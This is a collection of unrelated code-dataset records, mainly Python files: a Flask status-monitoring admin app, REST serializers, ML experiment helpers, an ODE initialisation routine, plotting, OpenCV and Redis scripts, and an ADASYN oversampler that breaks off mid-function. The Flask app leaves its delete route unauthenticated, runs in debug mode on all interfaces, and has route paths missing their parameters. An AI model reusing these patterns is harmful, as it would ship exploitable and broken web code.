+{"seq_id":"365485417","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\n\"\"\"\n\n Author : github/TonyChg\n Purpose :\n Usage :\n Example :\n\n\"\"\"\n\nimport urllib\nimport requests\nimport mysql.connector\nimport threading\nfrom database import Database\n\nfrom passlib.hash import argon2\nfrom flask import Flask, render_template, g, redirect, \\\n url_for, request, abort, session\n\nfrom status import Status\nfrom datetime import datetime\n\ntry:\n app = Flask(__name__)\n app.config.from_object('config')\n database = Database(\n app.config['DATABASE_HOST'],\n app.config['DATABASE_USER'],\n app.config['DATABASE_PASSWORD'],\n app.config['DATABASE_NAME']\n )\nexcept Exception as e:\n print(e)\n print(\"Fail to start. exiting\")\n exit(1)\n\ndef validate_url(url):\n try:\n result = urllib.parse.urlparse(url)\n if result.scheme != 'http' and result.scheme != 'https':\n raise ValueError\n return True\n except:\n return False\n\ndef request_to_dict(keys):\n entity = []\n for key in keys:\n entity.append((key, request.form.get(key)))\n return dict(entity)\n\ndef human_timestamp(timestamp):\n time = datetime.strptime(str(timestamp), \"%Y-%m-%d %H:%M:%S\")\n delta = datetime.now() - time\n formattime = \"\"\n\n if hasattr(delta, 'hours'):\n formattime += \"{} h\".format(delta.hours)\n if hasattr(delta, 'minutes'):\n formattime += \"{} m\".format(delta.minutes)\n if hasattr(delta, 'seconds'):\n formattime += \"{} s\".format(delta.seconds)\n print(formattime)\n return formattime\n\ndef authenticate_user():\n try:\n user = request_to_dict(['email', 'password'])\n\n if not user['email'] or not user['password']:\n raise Exception('Invalid form.')\n find_user = database.find_user_by_email(user['email'])\n\n if not find_user or not argon2.verify(user['password'], find_user[1]):\n raise Exception('Invalid crendentials')\n else:\n print(\"Authenticated user: {}\".format(find_user[0]))\n session['logged_user'] = find_user[0]\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('login.html', message=e)\n\n@app.route('/admin/delete/website/', methods=[\"GET\"])\ndef delete_website(website_id):\n try:\n find_website = database.fetch_one_website(website_id)\n if not find_website[0]:\n raise Exception('Invalid website id.')\n database.delete_website(find_website[0])\n return redirect(url_for('admin'))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/create/website', methods=['GET', 'POST'])\ndef create_website():\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n if request.method == 'GET':\n return render_template('create_website.html')\n try:\n website = request_to_dict(['url', 'title'])\n if not website['url']:\n raise Exception('Invalid form.')\n if not validate_url(website['url']):\n raise Exception('Invalid url.')\n database.create_website(website)\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('create_website.html', message=e.args[0])\n\n@app.route('/admin/websites//delete/status')\ndef delete_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n database.delete_status(website_id)\n return redirect(url_for('show_status', website_id=website_id))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/websites/')\ndef show_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n website = database.fetch_one_website(website_id)\n status = database.fetch_status_by_website(website_id)\n return render_template('show_status.html', website=website, status=status)\n except Exception as e:\n abort(404)\n\n@app.route('/disconnect')\ndef disconnect():\n if session['logged_user']:\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/admin')\ndef admin():\n try:\n user = session['logged_user']\n websites = database.fetch_all_websites()\n return render_template('admin.html', websites=websites)\n except Exception as e:\n return redirect(url_for('connection'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef connection():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n return authenticate_user()\n\nif __name__ == '__main__':\n status = Status(name=\"Status Watchers\")\n status.start()\n app.run(threaded=True, debug=True, use_reloader=False, host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"471452875","text":"from rest_framework import serializers\nfrom .models import BasicProduct, SoldBasicProduct\nfrom ..customAuth.serializers import SafeUserDataSerializer\n\n\nclass BasicProductSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BasicProduct\n fields = ('id', 'title', 'slug', 'active', 'price')\n\n extra_kwargs = {\n 'id': {'read_only': True},\n 'slug': {'read_only': True},\n }\n\n\nclass SoldBasicProductSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(\n lookup_field='id',\n view_name=\"basic-product:sold-basic-product-detail\",\n read_only=True\n )\n\n basic_product = serializers.HyperlinkedRelatedField(\n read_only=True,\n lookup_field='slug',\n view_name='basic-product:basic-product-detail'\n )\n\n sold_to = serializers.SerializerMethodField()\n\n class Meta:\n model = SoldBasicProduct\n fields = [\n 'id', 'url', 'basic_product', 'price', 'sold_to',\n ]\n\n def get_sold_to(self, obj):\n return SafeUserDataSerializer(obj.sold_to).data\n","sub_path":"code/sNeeds/apps/basicProducts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584092120","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. module:: size_of_data_set_incremental_experiment\n :platform: Unix, Windows\n :synopsis: This module contains an abstract class used to conduct \n the first sub experiment of the preliminary experiment \n of the thesis. The experiment consists mainly of trying \n to find the optimal number of bug reports that should \n be used to train a classifier. In the context of the \n first sub experiment, all the folds, except the oldest \n one, are used to evaluate the performance of the \n classifier (cf. Master's Thesis). \n\n.. moduleauthor:: Daniel Artchounin \n\n\n\"\"\"\n\nimport numpy as np\nimport abc\nimport os\nimport inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath( \\\ninspect.getfile(inspect.currentframe())))\nos.sys.path.insert(0, current_dir)\nfrom sub_exp_of_preliminary_exp_launcher \\\nimport SubExpOfPreliminaryExpLauncher\n \nclass SubExp1OfPreliminaryExpLauncher(SubExpOfPreliminaryExpLauncher):\n \n @abc.abstractmethod\n def __init__(self, data_set_file, developers_dict_file, \\\n developers_list_file):\n super().__init__(data_set_file, developers_dict_file, \\\n developers_list_file)\n self._type = \"incremental\"\n \n def _yield_indices_for_learning_curve(self, K=33):\n super()._yield_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n yield np.asarray(range(indices[j], indices[i])), \\\n np.asarray(range(indices[i], indices[i+1]))\n \n def _generate_list_indices_for_learning_curve(self, K=33):\n super()._generate_list_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n train_indices = []\n test_indices = []\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n train_indices.append(list(range(indices[j], indices[i])))\n test_indices.append(list(range(indices[i], indices[i+1])))\n return train_indices, test_indices \n \n def plot_or_save_learning_curve(self, K=33, save_file=True):\n super().plot_or_save_learning_curve(K, save_file)","sub_path":"src/preliminary_experiment/sub_exp_1_of_preliminary_exp_launcher.py","file_name":"sub_exp_1_of_preliminary_exp_launcher.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"257849216","text":"\"\"\"Runge-Kutta initialisation.\"\"\"\n\n\nfrom typing import Optional\n\nimport numpy as np\nimport scipy.integrate as sci\n\nfrom probnum import filtsmooth, problems, randprocs, randvars\nfrom probnum.diffeq.odefilter.initialization_routines import _initialization_routine\nfrom probnum.typing import FloatArgType\n\n\nclass RungeKuttaInitialization(_initialization_routine.InitializationRoutine):\n r\"\"\"Initialize a probabilistic ODE solver by fitting the prior process to a few steps of an approximate ODE solution computed with Scipy's Runge-Kutta methods.\n\n Parameters\n ----------\n dt\n Maximum step-size to use for computing the approximate ODE solution. The smaller, the more accurate, but also, the smaller, the less stable.\n The best value here depends on the ODE problem, and probably the chosen method. Optional. Default is ``1e-2``.\n method\n Which solver to use. This is communicated as a string that is compatible with ``scipy.integrate.solve_ivp(..., method=method)``.\n Optional. Default is `DOP853`.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from probnum.randvars import Normal\n >>> from probnum.problems.zoo.diffeq import vanderpol\n >>> from probnum.randprocs.markov.integrator import IntegratedWienerProcess\n\n Compute the initial values of the van-der-Pol problem as follows.\n First, we set up the ODE problem and the prior process.\n\n >>> ivp = vanderpol()\n >>> print(ivp.y0)\n [2. 0.]\n >>> prior_process = IntegratedWienerProcess(initarg=ivp.t0, num_derivatives=3, wiener_process_dimension=2)\n\n Next, we call the initialization routine.\n\n >>> rk_init = RungeKuttaInitialization()\n >>> improved_initrv = rk_init(ivp=ivp, prior_process=prior_process)\n >>> print(prior_process.transition.proj2coord(0) @ improved_initrv.mean)\n [2. 0.]\n >>> print(np.round(improved_initrv.mean, 1))\n [ 2. 0. -2. 58.2 0. -2. 60. -1745.7]\n >>> print(np.round(np.log10(improved_initrv.std), 1))\n [-13.8 -11.3 -9. -1.5 -13.8 -11.3 -9. -1.5]\n \"\"\"\n\n def __init__(\n self, dt: Optional[FloatArgType] = 1e-2, method: Optional[str] = \"DOP853\"\n ):\n self.dt = dt\n self.method = method\n super().__init__(is_exact=False, requires_jax=False)\n\n def __call__(\n self,\n ivp: problems.InitialValueProblem,\n prior_process: randprocs.markov.MarkovProcess,\n ) -> randvars.RandomVariable:\n \"\"\"Compute the initial distribution.\n\n For Runge-Kutta initialization, it goes as follows:\n\n 1. The ODE integration problem is set up on the interval ``[t0, t0 + (2*order+1)*h0]``\n and solved with a call to ``scipy.integrate.solve_ivp``. The solver is uses adaptive steps with ``atol=rtol=1e-12``,\n but is forced to pass through the\n events ``(t0, t0+h0, t0 + 2*h0, ..., t0 + (2*order+1)*h0)``.\n The result is a vector of time points and states, with at least ``(2*order+1)``.\n Potentially, the adaptive steps selected many more steps, but because of the events, fewer steps cannot have happened.\n\n 2. A prescribed prior is fitted to the first ``(2*order+1)`` (t, y) pairs of the solution. ``order`` is the order of the prior.\n\n 3. The value of the resulting posterior at time ``t=t0`` is an estimate of the state and all its derivatives.\n The resulting marginal standard deviations estimate the error. This random variable is returned.\n\n Parameters\n ----------\n ivp\n Initial value problem.\n prior_process\n Prior Gauss-Markov process.\n\n Returns\n -------\n Normal\n Estimated (improved) initial random variable. Compatible with the specified prior.\n \"\"\"\n f, y0, t0, df = ivp.f, ivp.y0, ivp.t0, ivp.df\n y0 = np.asarray(y0)\n ode_dim = y0.shape[0] if y0.ndim > 0 else 1\n order = prior_process.transition.num_derivatives\n\n # order + 1 would suffice in theory, 2*order + 1 is for good measure\n # (the \"+1\" is a safety factor for order=1)\n num_steps = 2 * order + 1\n t_eval = np.arange(t0, t0 + (num_steps + 1) * self.dt, self.dt)\n sol = sci.solve_ivp(\n f,\n (t0, t0 + (num_steps + 1) * self.dt),\n y0=y0,\n atol=1e-12,\n rtol=1e-12,\n t_eval=t_eval,\n method=self.method,\n )\n\n # Measurement model for SciPy observations\n proj_to_y = prior_process.transition.proj2coord(coord=0)\n zeros_shift = np.zeros(ode_dim)\n zeros_cov = np.zeros((ode_dim, ode_dim))\n measmod_scipy = randprocs.markov.discrete.LTIGaussian(\n proj_to_y,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Measurement model for initial condition observations\n proj_to_dy = prior_process.transition.proj2coord(coord=1)\n if df is not None and order > 1:\n proj_to_ddy = prior_process.transition.proj2coord(coord=2)\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy, proj_to_ddy))\n initial_data = np.hstack((y0, f(t0, y0), df(t0, y0) @ f(t0, y0)))\n else:\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy))\n initial_data = np.hstack((y0, f(t0, y0)))\n zeros_shift = np.zeros(len(projmat_initial_conditions))\n zeros_cov = np.zeros(\n (len(projmat_initial_conditions), len(projmat_initial_conditions))\n )\n measmod_initcond = randprocs.markov.discrete.LTIGaussian(\n projmat_initial_conditions,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Create regression problem and measurement model list\n ts = sol.t[:num_steps]\n ys = list(sol.y[:, :num_steps].T)\n ys[0] = initial_data\n measmod_list = [measmod_initcond] + [measmod_scipy] * (len(ts) - 1)\n regression_problem = problems.TimeSeriesRegressionProblem(\n observations=ys, locations=ts, measurement_models=measmod_list\n )\n\n # Infer the solution\n kalman = filtsmooth.gaussian.Kalman(prior_process)\n out, _ = kalman.filtsmooth(regression_problem)\n estimated_initrv = out.states[0]\n return estimated_initrv\n","sub_path":"src/probnum/diffeq/odefilter/initialization_routines/_runge_kutta.py","file_name":"_runge_kutta.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"606611295","text":"import collections\n\nimport numpy as np\nimport pandas as pd\n\nfrom typing import List, Callable, Union, Sequence\n\nMutator = Callable[[pd.DataFrame], pd.DataFrame]\n\n\ndef mutate_baselines(baseline_datas: List[pd.DataFrame],\n baselines_mutators: List[Mutator],\n inplace_mutations: Union[bool, Sequence[bool]] = True) -> List[pd.DataFrame]:\n \"\"\"\n Mutates the inputted baselines using the mutators.\n A mutation can be either inplace or create a new mutated version of each baselines in addition to the original\n This is done using the sequence inplace_mutations - for each mutator if the boolean in the same position within\n the sequence is True the mutation will be inplace, and if False the mutation will create a copy.\n If inplace_mutations is a single boolean, it will be treated as if all mutators have that value\n\n :param baseline_datas: the baselines to mutate\n :param baselines_mutators: the mutators to use - each will be used an all baselines\n :param inplace_mutations: marks which mutators will be inplace and which will create copies\n :return: a list of all mutated baselines (can contain both inplace and new mutations)\n \"\"\"\n if isinstance(inplace_mutations, collections.Sequence):\n assert len(inplace_mutations) == len(baselines_mutators), \"inplace specifications must match number of mutators\"\n else:\n inplace_mutations: List[bool] = [inplace_mutations] * len(baselines_mutators)\n\n mutated_baselines = [baseline_data.copy() for baseline_data in baseline_datas]\n\n for mutator, is_inplace_mutation in zip(baselines_mutators, inplace_mutations):\n if is_inplace_mutation:\n mutated_baselines = [mutator(baseline_data) for baseline_data in mutated_baselines]\n else:\n mutated_baselines += [mutator(baseline_data) for baseline_data in mutated_baselines]\n\n return mutated_baselines\n\n\ndef mult_baseline_sizes_mutation(mult: int, baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n multiplies the total amount of bytes and packets by a constant integer\n :param mult: the multitude by which the sizes will be multiplied\n :param baseline_data: the baseline to be mutated\n :return: a copy of the data with the sizes multiplied by the constant\n \"\"\"\n mutated_baseline = baseline_data.copy()\n mutated_baseline[['total_bytes', 'num_packets']] *= mult\n return mutated_baseline\n\n\ndef sizes_mult_mutator(mult: int) -> Mutator:\n \"\"\"\n creates a mutation method of `mult_baseline_sizes_mutation` with the inputted value\n :param mult: the constant the `mult_baseline_sizes_mutation` will use\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: mult_baseline_sizes_mutation(mult, baseline_data)\n\n\ndef shuffle_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n shuffle the indices of a baseline randomly\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with the indices (protocols) shuffled\n \"\"\"\n shuffled_indices: list = baseline_data.index.to_numpy().tolist()\n np.random.shuffle(shuffled_indices)\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=shuffled_indices)\n\n\ndef switch_2_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n switches the indices of 2 randomly chosen rows in the baseline\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with 2 rows' indices being switched\n \"\"\"\n indices: list = baseline_data.index.to_numpy().tolist()\n\n idx_to_switch = np.random.choice(np.arange(len(indices)), size=2, replace=False)\n indices[idx_to_switch[0]], indices[idx_to_switch[1]] = indices[idx_to_switch[1]], indices[idx_to_switch[0]]\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=indices)\n\n\ndef change_values_by_x_percent_mutation(baseline_data: pd.DataFrame, mutation_percentage: float,\n features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> pd.DataFrame:\n \"\"\"\n randomly changes the features of a baseline randomly by at most mutation_percentage,\n only in the protocols and features specified.\n Each value will that will be changed will be multiplied by a random number in the range (1-X, 1+X),\n When X is the mutation percentage\n :param baseline_data: the baseline to mutate\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the baseline randomly changed\n \"\"\"\n if features_to_change is None:\n features_to_change = baseline_data.columns.to_numpy().tolist()\n\n if protocols_to_change is None:\n protocols_to_change = baseline_data.index.to_numpy().tolist()\n\n rand_vals = pd.DataFrame(\n np.random.uniform(1 - mutation_percentage, 1 + mutation_percentage, size=baseline_data.to_numpy().shape),\n columns=baseline_data.columns, index=baseline_data.index)\n\n # set features and protocols that should not be changed to be multiplied by 1\n rand_vals[list(set(rand_vals.columns).difference(features_to_change))] = 1.0\n rand_vals.loc[list(set(rand_vals.index).difference(protocols_to_change))] = 1.0\n\n mutated_data = baseline_data * rand_vals\n for col in mutated_data.columns:\n mutated_data[col] = mutated_data[col].astype(baseline_data[col].dtype)\n\n return mutated_data\n\n\ndef rand_by_x_percent_mutator(mutation_percentage: float, features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> Mutator:\n \"\"\"\n Returns a `change_values_by_x_percent_mutation` with the inputted percentage, features and protocols\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: change_values_by_x_percent_mutation(baseline_data, mutation_percentage,\n features_to_change, protocols_to_change)\n\n\n__all__ = [\n 'Mutator',\n 'mutate_baselines',\n 'mult_baseline_sizes_mutation',\n 'sizes_mult_mutator',\n 'shuffle_protocols_mutation',\n 'switch_2_protocols_mutation',\n 'change_values_by_x_percent_mutation',\n 'rand_by_x_percent_mutator',\n]\n","sub_path":"ReinforcementLearning/mutators.py","file_name":"mutators.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"257053137","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninput = open(\"throughput_ins.csv\", 'r', encoding='utf-8')\n\nkey = []\nva = []\nfb_va_ss = []\nfb_std_ss = []\nfb_va = []\nfb_std = []\nbloom = []\n\nfor line in input.readlines():\n if line.find('occ') != -1: continue\n cur_line = line.strip()\n row = [0, 0, 0, 0, 0, 0, 0]\n row[0], row[1], row[2], row[3], row[4], row[5], row[6] = map(float, cur_line.split(',')[0:-1])\n key.append(row[0])\n va.append(row[1])\n bloom.append(row[2])\n fb_va_ss.append(row[3])\n fb_std_ss.append(row[4])\n fb_va.append(row[5])\n fb_std.append(row[6])\n\nkey = np.array(key)\nva = np.array(va)\nfb_va_ss = np.array(fb_va_ss)\nfb_std_ss = np.array(fb_std_ss)\nfb_va = np.array(fb_va)\nfb_std = np.array(fb_std)\nbloom = np.array(bloom)\n\nprint(fb_std_ss)\n\nplt.figure(figsize = (12, 9))\nplt.plot(key, fb_std, marker = \"+\", label = \"CF\", markersize = 12)\nplt.plot(key, fb_va, marker = \"*\", label = \"VF\", markersize = 12)\nplt.plot(key, bloom, marker = \"s\", label = \"BF\", markersize = 12)\nplt.plot(key, fb_std_ss, marker = \"v\", label = \"CF-ss (Padding)\", markersize = 12)\nplt.plot(key, fb_va_ss, marker = \"^\", label = \"VF-ss (Padding)\", markersize = 12)\nplt.plot(key, va, marker = \"o\", label = \"VF-ss (No Padding)\", markersize = 12)\n\nplt.legend(loc = \"best\", fontsize = 28, ncol = 2)\nplt.xlabel(\"Occupancy\", fontsize = 28)\n#plt.ylabel(\"Bits per Item\")\nplt.ylabel(\"Insert Throughput (MOPS)\", fontsize = 28)\n\n#t = key[-1]\n#xtick = np.linspace(float(key[0]), float(t), 8)\n#print(xtick)\nplt.xlim((-0.03, 1))\nplt.xticks(np.linspace(0, 1, 5), fontsize = 28)\nplt.yticks(np.linspace(0, 25, 6), fontsize = 28)\n\n#ytick = np.linspace(float(sscf12[0]), float(sscf12[-1]), 10)\n#print(ytick)\n#plt.ylim((sscf12[0], sscf12[-1]))\n#plt.yticks(ytick)\n\nplt.savefig(\"ins-throughput.png\")\n#plt.show()\n\nexit()\n\nplt.semilogx(w, bf, lw = 1.5, linestyle = \"--\", label = \"Bloom Filter\")\n#plt.semilogx(w, vf, lw = 1.5, label = \"Vacuum Filter\")\n#plt.semilogx(w, cf_best, lw = 1.5, linestyle = \"-.\", label = \"Cuckoo Filter Best Case\")\nplt.semilogx(w, vf, lw = 1.5, color = \"black\", label = \"Vacuum Filter / CF Best Case\")\nplt.semilogx(w, cf_avg, lw = 1.5, linestyle = \"-\", label = \"Cuckoo Filter Average Case\")\nplt.semilogx(w, cf_worst, lw = 1.5, label = \"Cuckoo Filter Worst Case\")\nplt.semilogx(w, low_bound, lw = 1, linestyle = \":\", color = \"black\", label = \"Lower Bound\")\nplt.xlabel(\"False Postive Rate\")\nplt.ylabel(\"Bits per Item\")\nplt.legend(loc = \"upper right\")\nplt.show()\n\nexit()\n\n#print(abs_time)\nprint(velocity)\n#print(height)\nplt.subplot(4, 1, 1)\nplt.plot(abs_time, a_z)\nplt.ylabel('Acceleration : m/s^2')\n\nplt.subplot(4, 1, 2)\nplt.plot(abs_time, velocity)\nplt.ylabel('Velocity : m/s')\n\nplt.subplot(4, 1, 3)\nplt.plot(abs_time, height)\nplt.ylabel('Height : m')\n\nplt.subplot(4, 1, 4)\nplt.plot(abs_time, h)\nplt.ylabel('Height_M : m')\n\nplt.xlabel('time : s')\nplt.show()\n\n","sub_path":"Figures/gen-ins.py","file_name":"gen-ins.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"2735808","text":"import numpy as np\nimport cv2\nimport math\nimport serial\narduino = serial.Serial('COM6', 9600)\n# arduino = serial.Serial('COM5', 9600)\nchup =0;\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ntong=0\ndata=0\ndef pythonreply(para):\n msg = str(para)\n arduino.write(bytes(msg))\n print(msg)\nwhile True:\n length=0\n ret, img = cap.read()\n data = arduino.read()\n data = str(data)\n key = cv2.waitKey(10) \n ret, img = cap.read()\n if img is None:\n break\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 200, 220)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 10, 10, 2, 350);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n # print (length)\n key = cv2.waitKey(10)\n \n if key == 27:\n break\n if data==\"c\":\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 100, 120)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 20, None, 2, 480);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n length = lines[0][0][1] - lines[0][0][3] \n print(length)\n if(length<180 or length>220):\n print(\"khong dat\")\n pythonreply(0)\n data=\"kc\"\n elif(length>=180 and length<=220):\n print(\"dat\")\n pythonreply(1)\n data=\"kc\" \n length=0 \ncv2.destroyAllWindows() \ncv2.VideoCapture(0).release()","sub_path":"ImageProcessing.py","file_name":"ImageProcessing.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"324819168","text":"from tkinter import *\n\nclass Window(Frame):\n def __init__(self, master = None):\n Frame.__init__(self, master = None)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Main Menu\")\n self.pack(fill=BOTH, expand = 1)\n\n logoutButton = Button(self, text = \"Log Out\")\n logoutButton.place(x = 740, y = 10)\n\n \n\n\nroot = Tk()\nroot.geometry(\"800x450\")\napp = Window(root)\nroot.mainloop()","sub_path":"UI/studentMenu.py","file_name":"studentMenu.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"419175266","text":"import settings\nimport redis\nimport csv\nimport sys\nimport os\n\ndef ProcessCSVFile(r, csvin):\n\twith open(csvin, 'rt', encoding='utf-8') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE, )\n\n\t\t# Ignore Row Header\n\t\tnext(spamreader)\n\n\t\tfor row in spamreader:\n\t\t\tProcessCustomerRow(r, row)\n\ndef ProcessCustomerRow(r, row):\n\t# CSV Header\n\t# ID,Company,Contact,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax\n\n\t_key = \"customer-country:\" + row[8]\n\t_id = row[0]\n\tr.sadd(_key, _id)\n\nif __name__ == \"__main__\":\n\tprint(\"Reading Customers...\")\n\t_csvPath = os.path.dirname(os.path.dirname(__file__))\n\t_customersCSV = os.path.join(_csvPath, \"CSVs\", \"customers.csv\")\n\n\t# Connect to Redis\n\tr = redis.Redis(host=settings.redisSettings[\"host\"], port=settings.redisSettings[\"port\"], password=settings.redisSettings[\"password\"], db=settings.redisSettings[\"database\"])\n\n\tProcessCSVFile(r, _customersCSV)\n\n\tprint(\"Reading Customers Completed\")\n","sub_path":"Redis-Python/07_Create_Customers_Country_Key.py","file_name":"07_Create_Customers_Country_Key.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"323747464","text":"import numpy as np\nfrom sklearn import neighbors\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport operator\nfrom statistics import mean\n\n\ndef adasyn(xtrain, ytrain, target_column, class_to_boost, complex_model, nominal, n_neighbors, boost_coef):\n # (xtrain, ytrain, beta, threshold, target_column, boost_coef, K=5)\n # we introduce the parameter class weight\n # it says how many times we want to increase the population of each class\n # df, X_train, y_train, class_weight, \"target\"\n train_dataset = pd.concat([xtrain, ytrain], axis=1, sort=False)\n # print(len(train_dataset))\n # print(train_dataset)\n if class_to_boost == 1:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=False)\n m = int(sum(ytrain))\n # print(m)\n\n else:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=True)\n m1 = int(sum(ytrain))\n # print(m1)\n m = len(ytrain) - m1\n # print(m)\n\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n clf.fit(xtrain, ytrain)\n\n # Step 2a, if the minority data set is below the maximum tolerated threshold, generate data.\n # Beta is the desired balance level parameter. Beta > 1 means u want more of the imbalanced type, vice versa.\n G = boost_coef * m - m\n\n # Step 2b, find the K nearest neighbours of each minority class example in euclidean distance.\n # Find the ratio ri = majority_class in neighbourhood / K\n Ri = []\n Minority_per_xi = []\n for i in range(m):\n xi = xtrain.iloc[i, :]\n # print(xi)\n # Returns indices of the closest neighbours, and return it as a list\n neighbours = clf.kneighbors([xi], n_neighbors=n_neighbors, return_distance=False)[0]\n # print(neighbours)\n # Skip classifying itself as one of its own neighbours\n # neighbours = neighbours[1:]\n\n # Count how many belongs to the majority class\n count = 0\n for value in neighbours:\n if value > m:\n count += 1\n\n # Find all the minority examples\n minority = []\n for value in neighbours:\n # Shifted back 1 because indices start at 0\n if value <= m - 1:\n minority.append(value)\n # print(minority)\n # print(count)\n if len(minority) >= 2:\n Ri.append(count / n_neighbors)\n Minority_per_xi.append(minority)\n elif len(minority) == 1:\n Ri.append(1/n_neighbors)\n Minority_per_xi.append(minority)\n else:\n Ri.append(0)\n Minority_per_xi.append(minority)\n\n # Step 2c, normalize ri's so their sum equals to 1\n Rhat_i = []\n for ri in Ri:\n rhat_i = ri / sum(Ri)\n Rhat_i.append(rhat_i)\n\n # Step 2d, calculate the number of synthetic data examples that will be generated for each minority example\n Gi = []\n for rhat_i in Rhat_i:\n gi = round(rhat_i * G)\n Gi.append(int(gi))\n # print(max(Gi))\n\n l = []\n for group in Minority_per_xi:\n l.append(len(group))\n\n # print(min(l))\n # # Step 2e, generate synthetic examples\n number_of_added_data = 0\n syn_data = []\n\n for i in range(m):\n most_common_nominal = {}\n xi = xtrain.iloc[i, :]\n if len(nominal) >= 1:\n for feature in nominal:\n count = 0\n sum_nominal = 0\n # print(feature)\n for sample in Minority_per_xi[i]:\n # print(sample)\n x_sample = xtrain.iloc[sample, :]\n # print(x_sample)\n # print(type(x_sample))\n #feature_value = x_sample[feature]\n sum_nominal += x_sample[feature]\n\n #if feature_value in count:\n # count[feature_value] += 1\n #else:\n # count[feature_value] = 1\n most_common_nominal[feature] = round(sum_nominal/len(Minority_per_xi[i]))\n #key_max = max(count.items(), key=operator.itemgetter(1))[0]\n #most_common_nominal[feature] = key_max\n # print(\"xi\", xi)\n for j in range(Gi[i]):\n # If the minority list is not empty\n if Minority_per_xi[i]:\n index = np.random.choice(Minority_per_xi[i])\n xzi = xtrain.iloc[index, :]\n si = xi + (xzi - xi) * np.random.uniform(0, 1)\n 